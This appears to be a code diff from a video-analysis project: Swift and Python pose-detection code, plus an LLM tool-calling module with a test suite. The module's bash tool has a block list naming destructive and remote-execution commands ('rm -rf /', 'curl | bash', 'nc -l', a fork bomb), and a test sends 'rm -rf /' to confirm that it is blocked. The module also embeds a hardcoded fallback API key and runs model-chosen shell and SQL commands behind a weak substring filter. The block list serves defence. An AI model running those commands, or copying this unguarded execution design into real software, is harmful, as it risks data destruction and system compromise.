frameIndex: Int,
frameToTraces: [Int: [(traceId: Int, x: Double, y: Double, w: Double, h: Double)]],
activeTraceIds: Set<Int>
) -> Int? {
var nearestFrame: Int? = nil
var nearestDist = Int.max
for (frameNum, traces) in frameToTraces {
// Check if this frame has an active trace
let hasActiveTrace = traces.contains { activeTraceIds.contains($0.traceId) }
if hasActiveTrace {
let dist = abs(frameNum - frameIndex)
if dist < nearestDist {
nearestDist = dist
nearestFrame = frameNum
}
}
}
return nearestFrame
}
func detectPose(pixelBuffer: CVPixelBuffer) -> (hasPose: Bool, persons: [[String: Any]]) {
let imgW = CGFloat(CVPixelBufferGetWidth(pixelBuffer))
let imgH = CGFloat(CVPixelBufferGetHeight(pixelBuffer))
let handler = VNImageRequestHandler(cvPixelBuffer: pixelBuffer, options: [:])
let bodyReq = VNDetectHumanBodyPoseRequest()
do {
try handler.perform([bodyReq])
} catch {
return (false, [])
}
let jointNames: [VNHumanBodyPoseObservation.JointName] = [
.nose, .leftEye, .rightEye, .leftEar, .rightEar,
.neck, .root,
.leftShoulder, .rightShoulder,
.leftElbow, .rightElbow,
.leftWrist, .rightWrist,
.leftHip, .rightHip,
.leftKnee, .rightKnee,
.leftAnkle, .rightAnkle,
]
var persons: [[String: Any]] = []
let poses = bodyReq.results ?? []
for pose in poses {
var keypoints: [[String: Any]] = []
var minX = CGFloat.greatestFiniteMagnitude
var minY = CGFloat.greatestFiniteMagnitude
var maxX: CGFloat = 0
var maxY: CGFloat = 0
for joint in jointNames {
if let point = try? pose.recognizedPoint(joint) {
let desc = String(describing: joint.rawValue)
var rawName = desc
.replacingOccurrences(of: "VNRecognizedPointKey(_rawValue: ", with: "")
.replacingOccurrences(of: ")", with: "")
.trimmingCharacters(in: .whitespaces)
let nameMap: [String: String] = [
"head_joint": "nose",
"left_eye_joint": "left_eye",
"right_eye_joint": "right_eye",
"left_ear_joint": "left_ear",
"right_ear_joint": "right_ear",
"neck_1_joint": "neck",
"left_shoulder_1_joint": "left_shoulder",
"right_shoulder_1_joint": "right_shoulder",
"left_elbow_1_joint": "left_elbow",
"right_elbow_1_joint": "right_elbow",
"left_hand_joint": "left_wrist",
"right_hand_joint": "right_wrist",
"left_hip_1_joint": "left_hip",
"right_hip_1_joint": "right_hip",
"left_knee_1_joint": "left_knee",
"right_knee_1_joint": "right_knee",
"left_ankle_1_joint": "left_ankle",
"right_ankle_1_joint": "right_ankle",
"center_hip_joint": "root",
]
if let mapped = nameMap[rawName] {
rawName = mapped
}
let px = point.location.x * CGFloat(imgW)
let py = CGFloat(imgH) - point.location.y * CGFloat(imgH)
keypoints.append([
"name": rawName.isEmpty ? "\(joint)" : rawName,
"x": px,
"y": py,
"confidence": point.confidence,
])
if point.confidence > 0.1 {
minX = min(minX, px)
minY = min(minY, py)
maxX = max(maxX, px)
maxY = max(maxY, py)
}
}
}
var bbox: [String: Any] = ["x": 0, "y": 0, "width": 0, "height": 0]
if maxX > minX {
bbox = [
"x": Int(minX),
"y": Int(minY),
"width": Int(maxX - minX),
"height": Int(maxY - minY),
]
}
persons.append(["keypoints": keypoints, "bbox": bbox])
}
return (!persons.isEmpty, persons)
}
}
+345
View File
@@ -0,0 +1,345 @@
#!/opt/homebrew/bin/python3.11
"""
Test MediaPipe Pose alignment on face trace key frames
Tests 50 random key frames to determine alignment rate.
Handles multiple poses by matching only the correct one with face bbox.
Usage:
python3 scripts/test_mediapipe_pose_alignment.py --file-uuid <uuid> --sample-size 50
"""
import argparse
import json
import os
import random
import sys
import time
from pathlib import Path
try:
import cv2
import mediapipe as mp
from mediapipe.tasks.python.vision import PoseLandmarker, PoseLandmarkerOptions
from mediapipe.tasks.python.core.base_options import BaseOptions
except ImportError as e:
print(f"Missing dependency: {e}", file=sys.stderr)
sys.exit(1)
LANDMARK_NAMES = [
"nose", "left_eye_inner", "left_eye", "left_eye_outer",
"right_eye_inner", "right_eye", "right_eye_outer",
"left_ear", "right_ear", "mouth_left", "mouth_right",
"left_shoulder", "right_shoulder", "left_elbow", "right_elbow",
"left_wrist", "right_wrist", "left_pinky", "right_pinky",
"left_index", "right_index", "left_thumb", "right_thumb",
"left_hip", "right_hip", "left_knee", "right_knee",
"left_ankle", "right_ankle", "left_heel", "right_heel",
"left_foot_index", "right_foot_index",
]
def point_in_bbox(x, y, bbox):
"""Check if point (in pixels) is inside bbox (in pixels)."""
return (bbox['x'] <= x <= bbox['x'] + bbox['width'] and
bbox['y'] <= y <= bbox['y'] + bbox['height'])
def get_face_bbox(face_data, trace_id):
"""Get face bbox for a trace from face_traced.json."""
traces = face_data.get('traces', {})
frames = face_data.get('frames', {})
if trace_id not in traces:
return None
trace = traces[trace_id]
start_frame = str(trace.get('start_frame', 0))
if start_frame not in frames:
return None
frame_data = frames[start_frame]
faces = frame_data.get('faces', [])
# Find the face that belongs to this trace
for face in faces:
if face.get('trace_id') == int(trace_id):
return {
'x': face['x'],
'y': face['y'],
'width': face['width'],
'height': face['height']
}
# Fallback: use first face
if faces:
face = faces[0]
return {
'x': face['x'],
'y': face['y'],
'width': face['width'],
'height': face['height']
}
return None
def check_pose_alignment(pose_landmarks, face_bbox, img_width, img_height):
"""
Check if pose face keypoints align with face bbox.
Returns: (aligned: bool, face_keypoints: dict)
"""
# Get face keypoints from pose
kp_dict = {}
for idx, landmark in enumerate(pose_landmarks):
if idx < len(LANDMARK_NAMES):
name = LANDMARK_NAMES[idx]
if name in ['nose', 'left_eye', 'right_eye']:
# Convert normalized coords to pixels
kp_dict[name] = {
'x': landmark.x * img_width,
'y': landmark.y * img_height,
'confidence': landmark.visibility if hasattr(landmark, 'visibility') else 1.0
}
# Check if all 3 keypoints are in bbox
required = ['nose', 'left_eye', 'right_eye']
if not all(k in kp_dict for k in required):
return False, kp_dict
for name in required:
kp = kp_dict[name]
if not point_in_bbox(kp['x'], kp['y'], face_bbox):
return False, kp_dict
return True, kp_dict
def test_alignment(file_uuid, output_dir, sample_size=None):
"""Test MediaPipe pose alignment on key frames.
Args:
sample_size: If None, process all key frames. Otherwise, sample N.
"""
# Load face data
face_json = Path(output_dir) / f"{file_uuid}.face_traced.json"
if not face_json.exists():
print(f"[pose_keyframe] Face file not found: {face_json}", file=sys.stderr)
return
with open(face_json) as f:
face_data = json.load(f)
# Get all trace IDs with key_frame.jpg
output_path = Path(output_dir) / file_uuid
trace_dirs = sorted(output_path.glob("trace_*"))
valid_traces = []
for trace_dir in trace_dirs:
key_frame = trace_dir / "key_frame.jpg"
if key_frame.exists():
trace_id = trace_dir.name.replace("trace_", "")
valid_traces.append(trace_id)
print(f"[pose_keyframe] Found {len(valid_traces)} traces with key_frame.jpg")
# Sample or process all
if sample_size and len(valid_traces) > sample_size:
sample_traces = random.sample(valid_traces, sample_size)
else:
sample_traces = valid_traces
print(f"[pose_keyframe] Processing {len(sample_traces)} key frames...")
# Download model
model_path = os.path.expanduser("~/.mediapipe/models/pose_landmarker_heavy.task")
if not os.path.exists(model_path):
os.makedirs(os.path.dirname(model_path), exist_ok=True)
print(f"[test] Downloading model...")
import urllib.request
url = "https://storage.googleapis.com/mediapipe-models/pose_landmarker/pose_landmarker_heavy/float16/1/pose_landmarker_heavy.task"
urllib.request.urlretrieve(url, model_path)
# Initialize MediaPipe
options = PoseLandmarkerOptions(
base_options=BaseOptions(model_asset_path=model_path),
running_mode=mp.tasks.vision.RunningMode.IMAGE,
)
detector = PoseLandmarker.create_from_options(options)
# Test each sample
results = []
for i, trace_id in enumerate(sample_traces):
key_frame_path = output_path / f"trace_{trace_id}" / "key_frame.jpg"
# Get face bbox
face_bbox = get_face_bbox(face_data, trace_id)
if not face_bbox:
results.append({
'trace_id': trace_id,
'status': 'no_face_bbox',
'aligned': False
})
continue
# Read image
img = cv2.imread(str(key_frame_path))
if img is None:
results.append({
'trace_id': trace_id,
'status': 'cannot_read_image',
'aligned': False
})
continue
img_height, img_width = img.shape[:2]
# Detect pose
rgb_img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
mp_image = mp.Image(mp.ImageFormat.SRGB, rgb_img)
results_mp = detector.detect(mp_image)
if not results_mp.pose_landmarks:
results.append({
'trace_id': trace_id,
'status': 'no_pose_detected',
'aligned': False
})
continue
# Check each pose for alignment
aligned_poses = []
for pose_landmarks in results_mp.pose_landmarks:
aligned, face_kps = check_pose_alignment(
pose_landmarks, face_bbox, img_width, img_height
)
if aligned:
# Get all keypoints
all_keypoints = []
for idx, landmark in enumerate(pose_landmarks):
if idx < len(LANDMARK_NAMES):
name = LANDMARK_NAMES[idx]
all_keypoints.append({
'name': name,
'x': landmark.x * img_width,
'y': landmark.y * img_height,
'confidence': landmark.visibility if hasattr(landmark, 'visibility') else 1.0
})
aligned_poses.append({
'face_keypoints': face_kps,
'keypoints': all_keypoints
})
if aligned_poses:
# Get all keypoints from the best aligned pose
best_pose = aligned_poses[0]
all_keypoints = []
for idx, landmark in enumerate(pose_landmarks):
if idx < len(LANDMARK_NAMES):
name = LANDMARK_NAMES[idx]
all_keypoints.append({
'name': name,
'x': landmark.x * img_width,
'y': landmark.y * img_height,
'confidence': landmark.visibility if hasattr(landmark, 'visibility') else 1.0
})
pose_data = {
'keypoints': all_keypoints,
'face_keypoints': best_pose['face_keypoints'],
'num_poses_detected': len(results_mp.pose_landmarks),
'num_aligned': len(aligned_poses)
}
results.append({
'trace_id': trace_id,
'status': 'aligned',
'aligned': True,
'pose_data': pose_data
})
else:
results.append({
'trace_id': trace_id,
'status': 'pose_not_aligned',
'aligned': False,
'num_poses_detected': len(results_mp.pose_landmarks)
})
if (i + 1) % 10 == 0:
print(f"[test] Processed {i+1}/{len(sample_traces)} samples...")
detector.close()
# Calculate statistics
total = len(results)
aligned_count = sum(1 for r in results if r.get('aligned'))
status_counts = {}
for r in results:
status = r.get('status', 'unknown')
status_counts[status] = status_counts.get(status, 0) + 1
print(f"\n[pose_keyframe] === RESULTS ===")
print(f"[pose_keyframe] Total processed: {total}")
print(f"[pose_keyframe] Aligned: {aligned_count} ({aligned_count/total*100:.1f}%)")
print(f"[pose_keyframe] Not aligned: {total - aligned_count} ({(total-aligned_count)/total*100:.1f}%)")
print(f"\n[pose_keyframe] Status breakdown:")
for status, count in sorted(status_counts.items()):
print(f"[pose_keyframe] {status}: {count} ({count/total*100:.1f}%)")
# Save results
output_file = Path(output_dir) / f"{file_uuid}.pose_keyframe_results.json"
with open(output_file, 'w') as f:
json.dump({
'total_processed': total,
'aligned': aligned_count,
'alignment_rate': f"{aligned_count/total*100:.1f}%",
'status_counts': status_counts,
'results': results
}, f, indent=2)
print(f"\n[pose_keyframe] Results saved to: {output_file}")
# Update trace_profile.json for aligned poses
print(f"\n[pose_keyframe] Updating trace_profile.json for aligned poses...")
updated_count = 0
for r in results:
if r.get('aligned') and r.get('pose_data'):
trace_id = r['trace_id']
profile_path = output_path / f"trace_{trace_id}" / "trace_profile.json"
if profile_path.exists():
with open(profile_path) as f:
profile = json.load(f)
profile['pose'] = r['pose_data']
profile['pose_aligned'] = True
with open(profile_path, 'w') as f:
json.dump(profile, f, indent=2)
updated_count += 1
print(f"[pose_keyframe] Updated {updated_count} trace_profile.json files")
def main():
parser = argparse.ArgumentParser(description="Process MediaPipe pose on key frames")
parser.add_argument("--file-uuid", "-u", required=True, help="File UUID")
parser.add_argument("--output-dir", "-o", default="/Users/accusys/momentry/output", help="Output directory")
parser.add_argument("--sample-size", "-s", type=int, default=None, help="Sample size (default: all)")
parser.add_argument("--all", "-a", action="store_true", help="Process all key frames")
args = parser.parse_args()
sample_size = None if args.all else args.sample_size
test_alignment(args.file_uuid, args.output_dir, sample_size)
if __name__ == "__main__":
main()
+141
View File
@@ -0,0 +1,141 @@
#!/usr/bin/env python3
"""
Test script for Tool Calling Module
====================================
Tests sequential multi-tool execution.
"""
import sys
import os
sys.path.insert(0, os.path.dirname(__file__))
from tool_caller import OllamaToolCaller, ToolResult
import json
def test_single_tool():
"""Test single tool call"""
print("=" * 60)
print("TEST 1: Single Tool Call (PostgreSQL)")
print("=" * 60)
caller = OllamaToolCaller()
caller.register_default_tools()
query = "How many videos are in the database?"
print(f"Query: {query}")
print("-" * 60)
result = caller.run(query)
print(f"Result:\n{result}")
print()
def test_multi_tool():
"""Test multi-tool sequential call"""
print("=" * 60)
print("TEST 2: Multi-Tool Sequential (PostgreSQL → Qdrant)")
print("=" * 60)
caller = OllamaToolCaller()
caller.register_default_tools()
query = "Find videos about dogs, then search for similar content in the vector database"
print(f"Query: {query}")
print("-" * 60)
result = caller.run(query)
print(f"Result:\n{result}")
print()
def test_tool_direct():
"""Test direct tool execution"""
print("=" * 60)
print("TEST 3: Direct Tool Execution")
print("=" * 60)
caller = OllamaToolCaller()
caller.register_default_tools()
# Test PostgreSQL directly
print("Testing PostgreSQL tool directly:")
result = caller.registry.execute("query_postgres", {
"query": "SELECT COUNT(*) as count FROM videos"
})
print(f" Success: {result.success}")
print(f" Data: {result.data}")
print(f" Time: {result.execution_time_ms:.1f}ms")
print()
# Test Bash directly
print("Testing Bash tool directly:")
result = caller.registry.execute("execute_bash", {
"command": "echo 'Hello from Tool Caller!' && date"
})
print(f" Success: {result.success}")
print(f" Data: {result.data}")
print(f" Time: {result.execution_time_ms:.1f}ms")
print()
def test_bash_safety():
"""Test bash command safety"""
print("=" * 60)
print("TEST 4: Bash Safety Check")
print("=" * 60)
caller = OllamaToolCaller()
caller.register_default_tools()
# Test blocked command
print("Testing blocked command (rm -rf /):")
result = caller.registry.execute("execute_bash", {
"command": "rm -rf /"
})
print(f" Success: {result.success}")
print(f" Error: {result.error}")
print()
# Test safe command
print("Testing safe command:")
result = caller.registry.execute("execute_bash", {
"command": "ls -la /tmp | head -5"
})
print(f" Success: {result.success}")
print(f" Data: {result.data}")
print()
def main():
"""Run all tests"""
print("\n" + "=" * 60)
print("TOOL CALLING MODULE - TEST SUITE")
print("=" * 60 + "\n")
try:
# Test 1: Single tool
test_single_tool()
# Test 2: Multi tool
test_multi_tool()
# Test 3: Direct execution
test_tool_direct()
# Test 4: Safety
test_bash_safety()
print("=" * 60)
print("ALL TESTS COMPLETED")
print("=" * 60)
except Exception as e:
print(f"\nERROR: {e}")
import traceback
traceback.print_exc()
sys.exit(1)
if __name__ == "__main__":
main()
+790
View File
@@ -0,0 +1,790 @@
#!/usr/bin/env python3
"""
Momentry Tool Calling Module
============================
Supports sequential multi-tool execution using Ollama API.
Tools:
- query_postgres: PostgreSQL database queries
- search_qdrant: Vector similarity search
- execute_bash: Bash command execution
- call_api: HTTP API calls
Version: 1.1.0
Updated: 2026-07-26
Changes:
- Added embedding server health check
- Enhanced bash safety patterns
- Added logging support
- Environment variable for Qdrant collection
"""
import json
import logging
import os
import re
import subprocess
import requests
from typing import Any, Callable, Dict, List, Optional, Tuple
from dataclasses import dataclass
from datetime import datetime, date
# Configure logging
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s'
)
logger = logging.getLogger('tool_caller')
class DateTimeEncoder(json.JSONEncoder):
"""Custom JSON encoder for datetime objects"""
def default(self, obj):
if isinstance(obj, (datetime, date)):
return obj.isoformat()
return super().default(obj)
@dataclass
class ToolResult:
"""Result from tool execution"""
success: bool
data: Any
error: Optional[str] = None
execution_time_ms: float = 0
class ToolRegistry:
"""Registry for available tools"""
def __init__(self):
self._tools: Dict[str, Dict[str, Any]] = {}
self._executors: Dict[str, Callable] = {}
def register(
self,
name: str,
description: str,
parameters: Dict[str, Any],
executor: Callable[[Dict[str, Any]], ToolResult]
):
"""Register a new tool"""
self._tools[name] = {
"type": "function",
"function": {
"name": name,
"description": description,
"parameters": parameters
}
}
self._executors[name] = executor
logger.debug(f"Registered tool: {name}")
def get_definitions(self) -> List[Dict[str, Any]]:
"""Get all tool definitions for API calls"""
return list(self._tools.values())
def has_tool(self, name: str) -> bool:
"""Check if tool exists"""
return name in self._executors
def execute(self, name: str, arguments: Dict[str, Any]) -> ToolResult:
"""Execute a tool by name"""
if name not in self._executors:
logger.error(f"Unknown tool: {name}")
return ToolResult(
success=False,
data=None,
error=f"Unknown tool: {name}"
)
start_time = datetime.now()
logger.info(f"Executing tool: {name} with args: {json.dumps(arguments, ensure_ascii=False)[:200]}")
try:
result = self._executors[name](arguments)
elapsed = (datetime.now() - start_time).total_seconds() * 1000
result.execution_time_ms = elapsed
if result.success:
logger.info(f"Tool {name} succeeded in {elapsed:.1f}ms")
else:
logger.error(f"Tool {name} failed: {result.error}")
return result
except Exception as e:
elapsed = (datetime.now() - start_time).total_seconds() * 1000
logger.error(f"Tool {name} exception: {e}")
return ToolResult(
success=False,
data=None,
error=str(e),
execution_time_ms=elapsed
)
class OllamaToolCaller:
"""Tool caller using Ollama API with improved stability"""
def __init__(
self,
base_url: str = "http://localhost:11434",
model: str = "llama3.1:8b",
max_iterations: int = 10,
max_tool_calls: int = 5
):
self.base_url = base_url
self.model = model
self.max_iterations = max_iterations
self.max_tool_calls = max_tool_calls
self.registry = ToolRegistry()
# System prompt optimized for tool calling
self.system_prompt = """You are a data assistant with access to tools.
CORE RULES:
1. When you receive a tool result, you MUST provide a final answer - do NOT call more tools
2. Call exactly ONE tool per response
3. Answer based on tool results, not assumptions
4. If tool fails, report the error and stop
IMPORTANT: After receiving ANY tool result, respond with a clear answer to the user."""
# Track tool calls for loop prevention
self._tool_call_history: List[str] = []
logger.info(f"Initialized OllamaToolCaller with model={model}")
def chat(self, messages: List[Dict[str, Any]]) -> Dict[str, Any]:
"""Send chat request to Ollama"""
url = f"{self.base_url}/api/chat"
payload = {
"model": self.model,
"messages": messages,
"tools": self.registry.get_definitions(),
"stream": False
}
logger.debug(f"Sending chat request to {url}")
response = requests.post(url, json=payload, timeout=120)
response.raise_for_status()
return response.json()
def execute_tool_call(self, tool_call: Dict[str, Any]) -> ToolResult:
"""Execute a single tool call with flexible argument parsing"""
func = tool_call.get("function", {})
name = func.get("name", "")
# Handle both dict and string arguments
arguments = func.get("arguments", {})
if isinstance(arguments, str):
try:
arguments = json.loads(arguments)
except json.JSONDecodeError:
arguments = {}
# Normalize arguments based on tool name
arguments = self._normalize_arguments(name, arguments)
return self.registry.execute(name, arguments)
def _normalize_arguments(self, tool_name: str, args: Dict[str, Any]) -> Dict[str, Any]:
"""Normalize arguments to match expected format"""
if not args:
return args
# For query_postgres, ensure we have 'query' parameter
if tool_name == "query_postgres":
if "query" not in args:
for key in ["query_text", "sql", "sql_query", "statement"]:
if key in args:
args["query"] = args[key]
break
# For search_qdrant, ensure we have 'query_text' parameter
elif tool_name == "search_qdrant":
if "query_text" not in args:
for key in ["query", "search", "text"]:
if key in args:
args["query_text"] = args[key]
break
return args
def _get_tool_key(self, name: str, arguments: Any) -> str:
"""Generate unique key for tool call"""
if isinstance(arguments, str):
try:
arguments = json.loads(arguments)
except:
arguments = {"raw": arguments}
return f"{name}:{json.dumps(arguments, sort_keys=True)}"
def _is_duplicate_call(self, tool_key: str) -> bool:
"""Check if this tool call was already made"""
is_dup = tool_key in self._tool_call_history
if is_dup:
logger.warning(f"Duplicate tool call detected: {tool_key[:50]}")
return is_dup
def _add_to_history(self, tool_key: str):
"""Add tool call to history"""
self._tool_call_history.append(tool_key)
def _extract_tool_from_text(self, text: str) -> Optional[Tuple[str, Dict[str, Any]]]:
"""Extract tool call from text content (when model outputs JSON instead of tool_calls)"""
if not text or '{"name":' not in text:
return None
try:
start_idx = text.find('{"name":')
if start_idx == -1:
return None
# Find the end of the JSON object
depth = 0
end_idx = start_idx
for i in range(start_idx, len(text)):
if text[i] == '{':
depth += 1
elif text[i] == '}':
depth -= 1
if depth == 0:
end_idx = i + 1
break
if end_idx > start_idx:
json_str = text[start_idx:end_idx]
# Fix common JSON issues
json_str = json_str.replace('\\ ', ' ')
json_str = json_str.replace('\\n', '\n')
tool_data = json.loads(json_str)
if 'name' in tool_data:
name = tool_data['name']
params = tool_data.get('parameters', tool_data.get('arguments', {}))
if self.registry.has_tool(name):
logger.debug(f"Extracted tool from text: {name}")
return (name, params)
except Exception as e:
logger.debug(f"Failed to extract tool from text: {e}")
return None
def _force_answer(self, messages: List[Dict[str, Any]], tool_results: str) -> str:
"""Force the model to provide a final answer based on tool results"""
messages.append({
"role": "user",
"content": f"Based on the tool results above, please provide your final answer now. Do not call any more tools.\n\nTool results:\n{tool_results}"
})
url = f"{self.base_url}/api/chat"
payload = {
"model": self.model,
"messages": messages,
"stream": False
}
try:
logger.info("Forcing final answer from model")
response = requests.post(url, json=payload, timeout=120)
response.raise_for_status()
return response.json().get("message", {}).get("content", "Unable to generate answer.")
except Exception as e:
logger.error(f"Failed to force answer: {e}")
return f"Tool execution completed. Results: {tool_results}"
def run(self, user_query: str) -> str:
"""
Run tool calling loop with user query.
Args:
user_query: The user's question or request
Returns:
Final text response from the model
"""
logger.info(f"Starting tool call loop for query: {user_query[:100]}")
self._tool_call_history = []
messages = [
{"role": "system", "content": self.system_prompt},
{"role": "user", "content": user_query}
]
tool_results_collected = []
for iteration in range(self.max_iterations):
logger.info(f"Iteration {iteration + 1}/{self.max_iterations}")
# Call LLM
response = self.chat(messages)
message = response.get("message", {})
content = message.get("content", "")
tool_calls = message.get("tool_calls", [])
# If no tool calls in response, check if content has text tool call
if not tool_calls:
extracted = self._extract_tool_from_text(content)
if extracted:
name, params = extracted
tool_key = self._get_tool_key(name, params)
if not self._is_duplicate_call(tool_key):
self._add_to_history(tool_key)
tool_call = {"function": {"name": name, "arguments": params}}
tool_result = self.execute_tool_call(tool_call)
# Build result string with error handling
if tool_result.success:
result_str = json.dumps({
"success": True,
"data": tool_result.data
}, ensure_ascii=False, cls=DateTimeEncoder)
else:
result_str = json.dumps({
"success": False,
"error": tool_result.error,
"suggestion": "Try a different tool or rephrase your query."
}, ensure_ascii=False)
messages.append({"role": "assistant", "content": "", "tool_calls": [tool_call]})
messages.append({"role": "user", "content": f"Tool result: {result_str}"})
tool_results_collected.append(f"{name}: {result_str[:500]}")
continue
# No tool call - return content
if content:
logger.info(f"Returning final answer after {iteration + 1} iterations")
return content
else:
return self._force_answer(messages, "\n".join(tool_results_collected) if tool_results_collected else "No tool was called")
# Execute first tool call (sequential)
tool_call = tool_calls[0]
func = tool_call.get("function", {})
tool_name = func.get("name", "")
arguments = func.get("arguments", {})
tool_key = self._get_tool_key(tool_name, arguments)
# Check for duplicate
if self._is_duplicate_call(tool_key):
return self._force_answer(messages, "\n".join(tool_results_collected) if tool_results_collected else "Tool already executed")
# Track and execute
self._add_to_history(tool_key)
tool_result = self.execute_tool_call(tool_call)
# Check if we've hit the tool call limit
if len(self._tool_call_history) >= self.max_tool_calls:
if tool_result.success:
result_str = json.dumps({
"success": True,
"data": tool_result.data
}, ensure_ascii=False, cls=DateTimeEncoder)
else:
result_str = json.dumps({
"success": False,
"error": tool_result.error,
"suggestion": "Try a different tool or rephrase your query."
}, ensure_ascii=False)
tool_results_collected.append(f"{tool_name}: {result_str[:500]}")
return self._force_answer(messages, "\n".join(tool_results_collected))
# Add to messages
messages.append({"role": "assistant", "content": "", "tool_calls": [tool_call]})
if tool_result.success:
result_str = json.dumps({
"success": True,
"data": tool_result.data
}, ensure_ascii=False, cls=DateTimeEncoder)
else:
result_str = json.dumps({
"success": False,
"error": tool_result.error,
"suggestion": "Try a different tool or rephrase your query."
}, ensure_ascii=False)
messages.append({"role": "user", "content": f"Tool result: {result_str}"})
tool_results_collected.append(f"{tool_name}: {result_str[:500]}")
# Max iterations reached
logger.warning(f"Max iterations ({self.max_iterations}) reached")
return self._force_answer(messages, "\n".join(tool_results_collected) if tool_results_collected else "Max iterations reached")
def register_default_tools(self, db_url: str = None, qdrant_url: str = None):
"""Register default tools with connection strings"""
# Get default collection from environment variable
default_collection = os.environ.get("QDRANT_DEFAULT_COLLECTION", "momentry_rule1")
logger.info(f"Using default Qdrant collection: {default_collection}")
# PostgreSQL tool
def query_postgres(args: Dict[str, Any]) -> ToolResult:
import psycopg2
import psycopg2.extras
query = args.get("query", "")
if not query:
return ToolResult(success=False, data=None, error="No query provided")
logger.info(f"Executing PostgreSQL query: {query[:100]}")
conn = psycopg2.connect(db_url or "postgres://accusys@localhost:5432/momentry")
try:
with conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor) as cur:
cur.execute(query)
if cur.description:
rows = cur.fetchall()
logger.info(f"Query returned {len(rows)} rows")
return ToolResult(
success=True,
data={"rows": [dict(r) for r in rows], "row_count": len(rows)}
)
else:
conn.commit()
logger.info(f"Query affected {cur.rowcount} rows")
return ToolResult(
success=True,
data={"affected_rows": cur.rowcount}
)
finally:
conn.close()
self.registry.register(
name="query_postgres",
description="Execute SQL query on PostgreSQL database. Use SELECT for queries, INSERT/UPDATE/DELETE for modifications.",
parameters={
"type": "object",
"properties": {
"query": {
"type": "string",
"description": "SQL query to execute"
}
},
"required": ["query"]
},
executor=query_postgres
)
# Qdrant tool with health check
def search_qdrant(args: Dict[str, Any]) -> ToolResult:
import requests as req
collection = args.get("collection", default_collection)
query_text = args.get("query_text", "")
limit = args.get("limit", 10)
# Get Qdrant API key from args or environment
api_key = args.get("api_key") or os.environ.get("QDRANT_API_KEY", "Test3200Test3200Test3200")
if not query_text:
return ToolResult(success=False, data=None, error="No query text provided")
logger.info(f"Searching Qdrant collection '{collection}' for: {query_text[:50]}")
# Check embedding server health
try:
embed_health = req.get("http://localhost:11436/health", timeout=5)
if embed_health.status_code != 200:
return ToolResult(
success=False,
data=None,
error=f"Embedding server not healthy (status={embed_health.status_code})"
)
except req.exceptions.ConnectionError:
return ToolResult(
success=False,
data=None,
error="Embedding server not available at http://localhost:11436"
)
except Exception as e:
return ToolResult(
success=False,
data=None,
error=f"Embedding server health check failed: {str(e)}"
)
# Get embedding
try:
embed_url = "http://localhost:11436/v1/embeddings"
embed_resp = req.post(embed_url, json={"input": query_text}, timeout=30)
embed_resp.raise_for_status()
embed_data = embed_resp.json()
# Handle both response formats
if "data" in embed_data:
embedding = embed_data["data"][0]["embedding"]
elif "embeddings" in embed_data:
embedding = embed_data["embeddings"][0]
else:
return ToolResult(
success=False,
data=None,
error=f"Unexpected embedding response format: {list(embed_data.keys())}"
)
logger.info(f"Generated embedding (dim={len(embedding)})")
except Exception as e:
return ToolResult(
success=False,
data=None,
error=f"Embedding generation failed: {str(e)}"
)
# Check Qdrant collection exists
qdrant_url_base = qdrant_url or "http://localhost:6333"
headers = {"api-key": api_key}
try:
collections_url = f"{qdrant_url_base}/collections"
coll_resp = req.get(collections_url, headers=headers, timeout=10)
coll_resp.raise_for_status()
collections = [c["name"] for c in coll_resp.json().get("result", {}).get("collections", [])]
logger.info(f"Available Qdrant collections: {collections}")
if collection not in collections:
return ToolResult(
success=False,
data=None,
error=f"Collection '{collection}' not found. Available: {', '.join(collections)}"
)
except Exception as e:
return ToolResult(
success=False,
data=None,
error=f"Qdrant connection failed: {str(e)}"
)
# Execute search
search_url = f"{qdrant_url_base}/collections/{collection}/points/search"
search_payload = {"vector": embedding, "limit": limit, "with_payload": True}
try:
search_resp = req.post(search_url, json=search_payload, headers=headers, timeout=30)
search_resp.raise_for_status()
results = search_resp.json().get("result", [])
logger.info(f"Qdrant returned {len(results)} matches")
except Exception as e:
return ToolResult(
success=False,
data=None,
error=f"Qdrant search failed: {str(e)}"
)
return ToolResult(
success=True,
data={
"matches": [
{"id": r.get("id"), "score": r.get("score"), "payload": r.get("payload", {})}
for r in results
],
"match_count": len(results)
}
)
self.registry.register(
name="search_qdrant",
description=f"Search for similar vectors in Qdrant collection. Default collection: {default_collection}",
parameters={
"type": "object",
"properties": {
"collection": {
"type": "string",
"description": f"Qdrant collection name (default: {default_collection})",
"default": default_collection
},
"query_text": {
"type": "string",
"description": "Search query text (will be embedded)"
},
"limit": {
"type": "integer",
"description": "Maximum number of results",
"default": 10
}
},
"required": ["query_text"]
},
executor=search_qdrant
)
# Bash tool with enhanced safety
def execute_bash(args: Dict[str, Any]) -> ToolResult:
command = args.get("command", "")
timeout = args.get("timeout", 30)
if not command:
return ToolResult(success=False, data=None, error="No command provided")
# Limit command length
if len(command) > 2000:
return ToolResult(success=False, data=None, error="Command too long (max 2000 chars)")
logger.info(f"Executing bash command: {command[:100]}")
# Enhanced safety patterns
blocked_patterns = [
# File system destruction
"rm -rf /", "rm -rf /*", "mkfs", "dd if=", "> /dev/",
# Permission escalation
"sudo ", "su -", "chmod 777", "chown root",
# Remote execution
"curl | bash", "curl | sh", "wget | sh", "wget | bash",
"curl http", "wget http",
# Fork bomb / DoS
":(){", "fork", "kill -9 1",
# Network listeners
"nc -l", "netcat -l", "socat",
# Process killing
"killall", "pkill",
# Disk operations
"fdisk", "parted",
]
command_lower = command.lower()
for pattern in blocked_patterns:
if pattern in command_lower:
logger.warning(f"Blocked dangerous command pattern: {pattern}")
return ToolResult(
success=False,
data=None,
error=f"Blocked dangerous command pattern: {pattern}"
)
try:
result = subprocess.run(
command,
shell=True,
capture_output=True,
text=True,
timeout=timeout
)
logger.info(f"Command completed with return code: {result.returncode}")
return ToolResult(
success=result.returncode == 0,
data={
"stdout": result.stdout[:5000],
"stderr": result.stderr[:2000],
"returncode": result.returncode
}
)
except subprocess.TimeoutExpired:
logger.error(f"Command timed out after {timeout}s")
return ToolResult(
success=False,
data=None,
error=f"Command timed out after {timeout}s"
)
self.registry.register(
name="execute_bash",
description="Execute a bash command on the system. Use for file operations, system checks, etc.",
parameters={
"type": "object",
"properties": {
"command": {
"type": "string",
"description": "Bash command to execute"
},
"timeout": {
"type": "integer",
"description": "Timeout in seconds",
"default": 30
}
},
"required": ["command"]
},
executor=execute_bash
)
# API tool
def call_api(args: Dict[str, Any]) -> ToolResult:
import requests as req
url = args.get("url", "")
method = args.get("method", "GET").upper()
headers = args.get("headers", {})
